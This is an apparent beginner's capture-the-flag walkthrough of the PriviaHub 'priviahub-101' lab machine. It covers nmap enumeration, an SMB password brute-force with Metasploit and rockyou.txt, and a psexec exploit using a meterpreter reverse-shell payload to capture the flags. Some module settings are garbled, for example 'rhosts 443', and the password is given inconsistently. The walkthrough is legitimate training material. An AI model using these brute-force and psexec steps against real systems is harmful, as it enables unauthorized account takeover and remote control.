PriviaHub Walkthrough : priviahub-101

priviahub

machine

Welcome to my first article on medium. Today we will be looking at priviahub-101 from PriviaHub. I specifically chose this machine because it can be a good start for people who wants to be penetration testers.

Summary :

• There are two important open ports on machine 139 and 445.
• SMB on ports 139 (NetBios) and port 445
• Port 139: SMB originally ran on top of NetBIOS using port 139. NetBIOS is an older transport layer that allows Windows computers to talk to each other on the same network.
• Port 445: Later versions of SMB (after Windows 2000) began to use port 445 on top of a TCP stack. Using TCP allows SMB to work over the internet.
• It is requested to use the rockyou.txt file to attack the Administrator account through the SMB service to Brute-Force attack. Then exploit the machine using the Metasploit psexec module and capture the flags.
• Basic windows privilege escalation with shell command.

Let’s start with this machine.

The “priviahub-101” machine IP is 172.16.71.175

We are going to apply the usual methodology of penetration testing as we have applied before. Let’s start with enumeration learn as much about the machine as possible.

Enumaration

We are going to start with the nmap scan to gather more information about the services and version running on this machine.

nmap -T4 -A -p- 172.16.71.175

nmap scan

As we can see, ports 139 and 445 are open. If you ask what it means, it shows there is a smb port opening. Server Message Block (SMB) is an application layer (layer 7) protocol that is widely used for file, port, named pipe and printer sharing. It is a client-server communication protocol. Let’s do an nmap scan again:

nmap -A -p 445 172.16.71.175

nmap 445 scan

SMB Brute-Force attack

We can use msfconsole to learn more information about this machine’s users. We are going to search smb login.

And now use a scanner module :

 use auxiliary/scanner/smb/smb_login
 show options
 set rhosts : target ip
 set SMBuser Administrator
 set PASS_FILE /root/rockyou.txt

We used the rockyou.txt to learn the administrator password.

If you say where did you find “Administrator” . It’s was written in the machine info.

We found Administrator password.

msfconsole

Exploitation

We will use this information for metasploit psexec module.

User : “Administrator” Password : “111111”

And then the last step is psexec module.

We are going to search smb psexec.

And now use a scanner module:

use exploit/Windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
show options
set rhosts target ip
set SMBUser Administrator
set SMBPass 11111
set lhosts set tun0
set rhosts 443
set target 2
exploit

We are inside the machine.

exploit

Privilege Escalation

And then we can write sysinfo to learn about this machine system info.

We can use Shell command for control through windows.

shell

We enumerate to grab the root.txt and user.txt flags.

user flag

We found the user flag.

root flag

We found the Root flag.

And our last step here is getting the root flag.

Hope you guys enjoyed this tutorial, let me know if you try this out. Follow me for more projects like this!